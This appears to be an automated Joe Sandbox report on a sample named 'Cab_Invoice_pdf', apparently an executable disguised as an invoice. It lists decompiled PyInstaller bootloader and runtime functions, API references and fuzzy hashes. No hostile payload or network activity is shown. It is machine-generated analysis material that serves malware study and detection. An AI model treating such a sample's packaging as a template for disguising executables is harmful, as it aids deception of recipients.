                            0x013262c0
                            0x00000000
                            0x013262c2
                            0x013262cc
                            0x013262d1
                            0x013262d6
                            0x013262d9
                            0x013262df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013262df
                            0x013262c0
                            0x01326295
                            0x01326295
                            0x00000000
                            0x01326295
                            0x01326262
                            0x01326262
                            0x01326268
                            0x00000000
                            0x0132626a
                            0x0132626a
                            0x0132626f
                            0x01326271
                            0x013262e1
                            0x013262e1
                            0x013262e7
                            0x013262e7
                            0x013262e9
                            0x0132627e
                            0x0132627e
                            0x0132627e
                            0x01326281
                            0x01326282
                            0x01326289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01326271
                            0x01326268
                            0x01326260
                            0x01326257
                            0x01326227
                            0x01326200
                            0x01326200
                            0x01326205
                            0x0132620b
                            0x0132628c
                            0x01326290
                            0x01326290
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID:
                            • API String ID: 2719235668-0
                            • Opcode ID: 39978136a3890c0a9e9d39e6b2dea88976777d75cd764bc54e76a22487a0f27c
                            • Instruction ID: 490073615fa8a6f556e13334bee73e99cd3a17d22bebe3cbb8ec7adc5f05c855
                            • Opcode Fuzzy Hash: 39978136a3890c0a9e9d39e6b2dea88976777d75cd764bc54e76a22487a0f27c
                            • Instruction Fuzzy Hash: CCD12AF1A04325ABDB35BF6C9843A6E7BF9AF0271CF04416DEE46A7285DB3199048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E013281FB(intOrPtr _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _t25;
                            				intOrPtr* _t26;
                            				intOrPtr _t28;
                            				intOrPtr* _t29;
                            				intOrPtr* _t31;
                            				intOrPtr* _t45;
                            				intOrPtr* _t46;
                            				intOrPtr* _t47;
                            				intOrPtr* _t55;
                            				intOrPtr* _t70;
                            				intOrPtr _t74;
                            
                            				_t74 = _a4;
                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                            				if(_t25 != 0 && _t25 != 0x133c838) {
                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                            					if(_t45 != 0 &&  *_t45 == 0) {
                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                            						if(_t46 != 0 &&  *_t46 == 0) {
                            							E013209EB(_t46);
                            							E01327D80( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                            						if(_t47 != 0 &&  *_t47 == 0) {
                            							E013209EB(_t47);
                            							E01327E7E( *((intOrPtr*)(_t74 + 0x88)));
                            						}
                            						E013209EB( *((intOrPtr*)(_t74 + 0x7c)));
                            						E013209EB( *((intOrPtr*)(_t74 + 0x88)));
                            					}
                            				}
                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                            				if(_t26 != 0 &&  *_t26 == 0) {
                            					E013209EB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                            					E013209EB( *((intOrPtr*)(_t74 + 0x8c)));
                            				}
                            				E0132836E( *((intOrPtr*)(_t74 + 0x9c)));
                            				_t28 = 6;
                            				_t55 = _t74 + 0xa0;
                            				_v8 = _t28;
                            				_t70 = _t74 + 0x28;
                            				do {
                            					if( *((intOrPtr*)(_t70 - 8)) != 0x133c300) {
                            						_t31 =  *_t70;
                            						if(_t31 != 0 &&  *_t31 == 0) {
                            							E013209EB(_t31);
                            							E013209EB( *_t55);
                            						}
                            						_t28 = _v8;
                            					}
                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                            						if(_t29 != 0 &&  *_t29 == 0) {
                            							E013209EB(_t29);
                            						}
                            						_t28 = _v8;
                            					}
                            					_t55 = _t55 + 4;
                            					_t70 = _t70 + 0x10;
                            					_t28 = _t28 - 1;
                            					_v8 = _t28;
                            				} while (_t28 != 0);
                            				return E013209EB(_t74);
                            			}
















                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0132823F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327D9D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DAF
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DC1
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DD3
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DE5
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327DF7
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E09
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E1B
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E2D
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E3F
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E51
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E63
                              • Part of subcall function 01327D80: _free.LIBCMT ref: 01327E75
                            • _free.LIBCMT ref: 01328234
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01328256
                            • _free.LIBCMT ref: 0132826B
                            • _free.LIBCMT ref: 01328276
                            • _free.LIBCMT ref: 01328298
                            • _free.LIBCMT ref: 013282AB
                            • _free.LIBCMT ref: 013282B9
                            • _free.LIBCMT ref: 013282C4
                            • _free.LIBCMT ref: 013282FC
                            • _free.LIBCMT ref: 01328303
                            • _free.LIBCMT ref: 01328320
                            • _free.LIBCMT ref: 01328338
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID:
                            • API String ID: 161543041-0
                            • Opcode ID: 35918a40a5145d08d7cc8130b8e0126d95337bfac1abb0daf236ae2e41940fd9
                            • Instruction ID: 53c8aa4b8fa531ebe811bd7292aeb80c714b057b3129855e0c54e41c5e2a0d8c
                            • Opcode Fuzzy Hash: 35918a40a5145d08d7cc8130b8e0126d95337bfac1abb0daf236ae2e41940fd9
                            • Instruction Fuzzy Hash: B8317C316007229FFB25BA7ED845B5B77F8EF01618F10495AE59AD71A0DF31AC44CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s.py$Could not get __main__ module's dict.$Could not get __main__ module.$Failed to execute script %s$Failed to unmarshal code object for %s$Name exceeds PATH_MAX$__file__$__main__
                            • API String ID: 0-2368408649
                            • Opcode ID: 37880bc331e4a1c061669ddbfe8e81de2e7fecb8a82c8177c0a567605a8465af
                            • Instruction ID: fccee037749153ab15a95ea8f1cbbed93eb4b509910f58fd01782a4dfe3d8732
                            • Opcode Fuzzy Hash: 37880bc331e4a1c061669ddbfe8e81de2e7fecb8a82c8177c0a567605a8465af
                            • Instruction Fuzzy Hash: BD417CB2904241ABD7289B3DEC0599B7B9CBF8432DF080A26F819D1289E634D144C7A7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: Failed to get _MEIPASS as PyObject.$_MEIPASS$loads$marshal$mod is NULL - %s$strict$utf-8
                            • API String ID: 2009864989-3336796446
                            • Opcode ID: 9b3550047c65ffbdd004c16c7d477319e04c4202536c76fb288669e902293868
                            • Instruction ID: 379d61f6f502944b680c6947874db1f3651a7cbf25e4b9a7339b936b3acfa379
                            • Opcode Fuzzy Hash: 9b3550047c65ffbdd004c16c7d477319e04c4202536c76fb288669e902293868
                            • Instruction Fuzzy Hash: F5312B72500201BBD7283B7DAC098A77B6CBF4133DF094516F906E224AEA21E515C7A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01324331(char _a4) {
                            				char _v8;
                            
                            				_t26 = _a4;
                            				_t52 =  *_a4;
                            				if( *_a4 != 0x1335190) {
                            					E013209EB(_t52);
                            					_t26 = _a4;
                            				}
                            				E013209EB( *((intOrPtr*)(_t26 + 0x3c)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x30)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x34)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x38)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x28)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x2c)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x40)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x44)));
                            				E013209EB( *((intOrPtr*)(_a4 + 0x360)));
                            				_v8 =  &_a4;
                            				E013241F7(5,  &_v8);
                            				_v8 =  &_a4;
                            				return E01324247(4,  &_v8);
                            			}





                            APIs
                            • _free.LIBCMT ref: 01324345
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 01324351
                            • _free.LIBCMT ref: 0132435C
                            • _free.LIBCMT ref: 01324367
                            • _free.LIBCMT ref: 01324372
                            • _free.LIBCMT ref: 0132437D
                            • _free.LIBCMT ref: 01324388
                            • _free.LIBCMT ref: 01324393
                            • _free.LIBCMT ref: 0132439E
                            • _free.LIBCMT ref: 013243AC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 074dc82ad75d8c45abbe877f3f1032b632e66457ec494eee6e442ac1df658a3f
                            • Instruction ID: a34deb2c0a6f41a3edc958bb7818b9b1a17d5b04330505ef6cb35815d45663c1
                            • Opcode Fuzzy Hash: 074dc82ad75d8c45abbe877f3f1032b632e66457ec494eee6e442ac1df658a3f
                            • Instruction Fuzzy Hash: 7811F876200519BFDB05FF59C882CDE3BB5EF15254B4140A2FA4A8F231DA31EE55DB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E01313C70(void* __edx, char _a4, short _a36, signed int _a8228, intOrPtr _a8236, intOrPtr _a8240) {
                            				intOrPtr _v0;
                            				void* __ebx;
                            				void* __edi;
                            				signed int _t13;
                            				intOrPtr _t24;
                            				void* _t27;
                            				WCHAR* _t28;
                            				WCHAR* _t37;
                            				intOrPtr _t45;
                            				void* _t47;
                            				void* _t50;
                            				intOrPtr _t51;
                            				void* _t53;
                            				void* _t57;
                            				intOrPtr _t64;
                            				intOrPtr _t72;
                            				signed int _t74;
                            				void* _t75;
                            				void* _t76;
                            				void* _t77;
                            
                            				E01317880();
                            				_t13 =  *0x133c008; // 0xa3433343
                            				_a8228 = _t13 ^ _t74;
                            				_push(_t50);
                            				_t72 = _a8240;
                            				_v0 = _a8236;
                            				_push(_t57);
                            				if(_t72 == 0) {
                            					_t51 = _v0;
                            					L6:
                            					GetTempPathW(0x1000,  &_a36);
                            					E01314710(_t53,  &_a4, 0x10, L"_MEI%d", GetCurrentProcessId());
                            					_t75 = _t74 + 0x10;
                            					_t64 = 0;
                            					__eflags = 0;
                            					while(1) {
                            						_t58 = E0131F329( &_a36,  &_a4);
                            						_t24 = E01314B30();
                            						_t76 = _t75 + 0xc;
                            						__eflags = _t24;
                            						if(_t24 == 0) {
                            							break;
                            						}
                            						L01319803(_t58);
                            						_t64 = _t64 + 1;
                            						_t75 = _t76 + 4;
                            						__eflags = _t64 - 5;
                            						if(_t64 < 5) {
                            							continue;
                            						}
                            						__eflags = _t72;
                            						if(_t72 == 0) {
                            							L4:
                            							_t27 = 0;
                            							L18:
                            							E0131786A();
                            							return _t27;
                            						}
                            						_t37 = E01314BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t68 = _t37;
                            							SetEnvironmentVariableW(_t37, 0);
                            							L01319803(_t68);
                            							_t77 = _t75 + 0x10;
                            							_t27 = 0;
                            						} else {
                            							_t61 = _t37;
                            							_t69 = E01314BF0(0, _t51, 0);
                            							E0131E1FC(_t37, _t40);
                            							L01319803(_t61);
                            							L01319803(_t69);
                            							L01319803(_t51);
                            							_t77 = _t75 + 0x2c;
                            							_t27 = 0;
                            						}
                            						goto L18;
                            					}
                            					E01314C90(_v0, _t58, 0x1000);
                            					L01319803(_t58);
                            					_t77 = _t76 + 0x10;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						_t28 = E01314BF0(0, "TMP", 0);
                            						__eflags = _t51;
                            						if(_t51 == 0) {
                            							_t66 = _t28;
                            							SetEnvironmentVariableW(_t28, 0);
                            							L01319803(_t66);
                            							_t77 = _t77 + 0x10;
                            						} else {
                            							_t60 = _t28;
                            							_t67 = E01314BF0(0, _t51, 0);
                            							E0131E1FC(_t28, _t31);
                            							L01319803(_t60);
                            							L01319803(_t67);
                            							L01319803(_t51);
                            							_t77 = _t77 + 0x2c;
                            						}
                            					}
                            					_t27 = 1;
                            					goto L18;
                            				}
                            				_push("TMP");
                            				_t45 = E01313E40(_t50, _t57);
                            				_push(_t72);
                            				_t51 = _t45;
                            				_t62 = E01313980();
                            				_t77 = _t74 + 8;
                            				if(_t46 == 0) {
                            					goto L4;
                            				}
                            				_t47 = E0131E1FC(L"TMP", _t62);
                            				L01319803(_t62);
                            				_t74 = _t77 + 0xc;
                            				_t83 = _t47;
                            				if(_t47 == 0) {
                            					goto L6;
                            				} else {
                            					_push("LOADER: Failed to set the TMP environment variable.\n");
                            					E01311910(_t83);
                            					_t77 = _t74 + 4;
                            					goto L4;
                            				}
                            			}
























                            APIs
                            • GetTempPathW.KERNEL32(00001000,?,?,?,00000000,00000000,01313C46,?,00000000,?,pyi-runtime-tmpdir), ref: 01313CF9
                            • GetCurrentProcessId.KERNEL32 ref: 01313CFF
                              • Part of subcall function 01313E40: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,013124FE,_MEIPASS2), ref: 01313E76
                              • Part of subcall function 01313E40: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,013124FE,_MEIPASS2), ref: 01313E92
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01313D9C
                              • Part of subcall function 01314C90: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,01344A58,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • SetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,TMP,00000000,?,?,?,?,?,?,?,00000000,0131210F,?,?), ref: 01313E11
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Environment$Variable$ByteCharMultiWide$CurrentExpandPathProcessStringsTemp
                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                            • API String ID: 2172272190-1116378104
                            • Opcode ID: aa9b0250f6e3227b7d60ad6e583880dd18188a6b8538f374ca320dcd8e24d09a
                            • Instruction ID: 24146a5e9725ad113699d02936d09b39c3f5bc0ac5f1ebc10a20bbd7c0cfa954
                            • Opcode Fuzzy Hash: aa9b0250f6e3227b7d60ad6e583880dd18188a6b8538f374ca320dcd8e24d09a
                            • Instruction Fuzzy Hash: EB413AB2A00302B7E32972BC9C45F6F799CAFA565CF090436FE089614AFA55990443F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E01313980(short _a8192, signed int _a16384, intOrPtr _a16392) {
                            				short _v0;
                            				void* __edi;
                            				signed int _t14;
                            				signed int _t19;
                            				void* _t43;
                            				WCHAR* _t57;
                            				signed int _t58;
                            				WCHAR* _t65;
                            				signed int _t69;
                            				void* _t70;
                            				void* _t71;
                            				void* _t72;
                            				signed int _t73;
                            
                            				E01317880();
                            				_t14 =  *0x133c008; // 0xa3433343
                            				_a16384 = _t14 ^ _t69;
                            				_t57 = E01314BF0(0, _a16392, 0);
                            				_t70 = _t69 + 0xc;
                            				_t82 = _t57;
                            				if(_t57 != 0) {
                            					_t19 = ExpandEnvironmentStringsW(_t57,  &_a8192, 0x1000);
                            					L01319803(_t57);
                            					_t71 = _t70 + 4;
                            					__eflags = _t19;
                            					if(__eflags != 0) {
                            						_t65 = E0131D518(0,  &_a8192, 0x1000);
                            						_t72 = _t71 + 0xc;
                            						__eflags = _t65;
                            						if(__eflags != 0) {
                            							E01318520(_t57,  &_v0, 0, 0x2000);
                            							_push(0x5c);
                            							_push(_t65);
                            							_t58 = E013188E7(_t43);
                            							_t73 = _t72 + 0x14;
                            							__eflags = _t58;
                            							while(_t58 != 0) {
                            								E0131DC18( &_v0, _t65, (_t58 - _t65 >> 1) + 1);
                            								CreateDirectoryW( &_v0, 0);
                            								_t11 = _t58 + 2; // 0x2
                            								_push(0x5c);
                            								_t58 = E013188E7((_t58 - _t65 >> 1) + 1);
                            								_t73 = _t73 + 0x14;
                            								__eflags = _t58;
                            							}
                            							CreateDirectoryW(_t65, 0);
                            							__eflags = _a16384 ^ _t73;
                            							E0131786A();
                            							return _t65;
                            						} else {
                            							_push("LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n");
                            							E01311910(__eflags);
                            							__eflags = _a16384 ^ _t72 + 0x00000004;
                            							E0131786A();
                            							return 0;
                            						}
                            					} else {
                            						_push("LOADER: Failed to expand environment variables in the runtime-tmpdir.\n");
                            						E01311910(__eflags);
                            						__eflags = _a16384 ^ _t71 + 0x00000004;
                            						E0131786A();
                            						return 0;
                            					}
                            				} else {
                            					_push("LOADER: Failed to convert runtime-tmpdir to a wide string.\n");
                            					E01311910(_t82);
                            					E0131786A();
                            					return 0;
                            				}
                            			}

















                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000,?,0131210F,?,?,00000000,?,00000000), ref: 013139E7
                            Strings
                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 01313A3F
                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 013139B3
                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 013139FC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharEnvironmentExpandMultiStringsWide
                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                            • API String ID: 2001182103-3498232454
                            • Opcode ID: 3f19b5da4be23502a0584aed214f34de9ac9b31c999d7ce4b0ab1fc985455b0f
                            • Instruction ID: 0c432d8833810cf058dfe687b0fcf65ad26ba84c97e932b2e8611fcf4b7a2f74
                            • Opcode Fuzzy Hash: 3f19b5da4be23502a0584aed214f34de9ac9b31c999d7ce4b0ab1fc985455b0f
                            • Instruction Fuzzy Hash: 3C31FEB2B403016BE238B2BCAC46F9FB389AF94664F440525FF49D7285F9749500C2DB
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E01314A10(void* __ecx, void* __edx, void* __eflags) {
                            				int* _t18;
                            				char* _t21;
                            				short* _t22;
                            				char* _t28;
                            				int* _t31;
                            				void* _t34;
                            				char* _t36;
                            				int* _t41;
                            				signed int _t42;
                            				signed int _t44;
                            				int _t45;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            
                            				_t34 = __edx;
                            				_t44 =  *(_t46 + 0x14);
                            				_push(4);
                            				_push(_t44 + 1);
                            				_t18 = E013197F8(__ecx);
                            				_t31 = _t18;
                            				_t47 = _t46 + 8;
                            				if(_t31 != 0) {
                            					_t36 = 0;
                            					__eflags = _t44;
                            					if(_t44 <= 0) {
                            						L16:
                            						_t31[_t44] = 0;
                            						return _t31;
                            					} else {
                            						_t41 = _t31;
                            						_t21 =  *(_t47 + 0x20) - _t31;
                            						__eflags = _t21;
                            						 *(_t47 + 0x20) = _t21;
                            						while(1) {
                            							_t22 = _t21[_t41];
                            							 *(_t47 + 0x30) = _t22;
                            							_t45 = WideCharToMultiByte(0xfde9, 0, _t22, 0xffffffff, 0, 0, 0, 0);
                            							__eflags = _t45;
                            							if(__eflags == 0) {
                            								break;
                            							}
                            							_t7 = _t45 + 1; // 0x1
                            							_push(1);
                            							_push(_t7);
                            							_t28 = E013197F8(_t7);
                            							_t47 = _t47 + 8;
                            							 *(_t47 + 0x14) = _t28;
                            							__eflags = _t28;
                            							if(__eflags == 0) {
                            								_push("Out of memory.");
                            								_push("win32_utils_to_utf8");
                            								goto L13;
                            							} else {
                            								__eflags = WideCharToMultiByte(0xfde9, 0,  *(_t47 + 0x24), 0xffffffff, _t28, _t45, 0, 0);
                            								if(__eflags == 0) {
                            									_push("Failed to encode wchar_t as UTF-8.\n");
                            									L12:
                            									_push("WideCharToMultiByte");
                            									L13:
                            									E01311860(_t34, __eflags);
                            									_t48 = _t47 + 8;
                            									 *_t41 = 0;
                            									_t42 = 0;
                            									__eflags = _t36;
                            									if(_t36 >= 0) {
                            										do {
                            											L01319803(_t31[_t42]);
                            											_t42 = _t42 + 1;
                            											_t48 = _t48 + 4;
                            											__eflags = _t42 - _t36;
                            										} while (_t42 <= _t36);
                            									}
                            									L01319803(_t31);
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t36 =  &(_t36[1]);
                            									_t44 =  *(_t47 + 0x1c);
                            									 *_t41 =  *(_t47 + 0x14);
                            									_t41 =  &(_t41[1]);
                            									__eflags = _t36 - _t44;
                            									if(_t36 >= _t44) {
                            										goto L16;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L17;
                            						}
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L17:
                            			}

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A9E
                            Strings
                            • WideCharToMultiByte, xrefs: 01314AD8
                            • Failed to encode wchar_t as UTF-8., xrefs: 01314AC0
                            • Failed to get UTF-8 buffer size., xrefs: 01314AD3
                            • Out of memory., xrefs: 01314AC7
                            • win32_utils_to_utf8, xrefs: 01314ACC
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: 00dcab5090623294635f8f510c44ca99a3e7dd94ccc9864fb15501394860f4df
                            • Instruction ID: 24d09bccea73a06958486961889e97851e68b99eb56601e1a8d8881c2db67000
                            • Opcode Fuzzy Hash: 00dcab5090623294635f8f510c44ca99a3e7dd94ccc9864fb15501394860f4df
                            • Instruction Fuzzy Hash: AC3182727843066BEB24AE5CAC41F5677D4EB40B1DF010139FE54B72C4E776E40483A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: %U?%zu$Failed to append to sys.path$Installing PYZ: Could not get sys.path$path$strict$utf-8
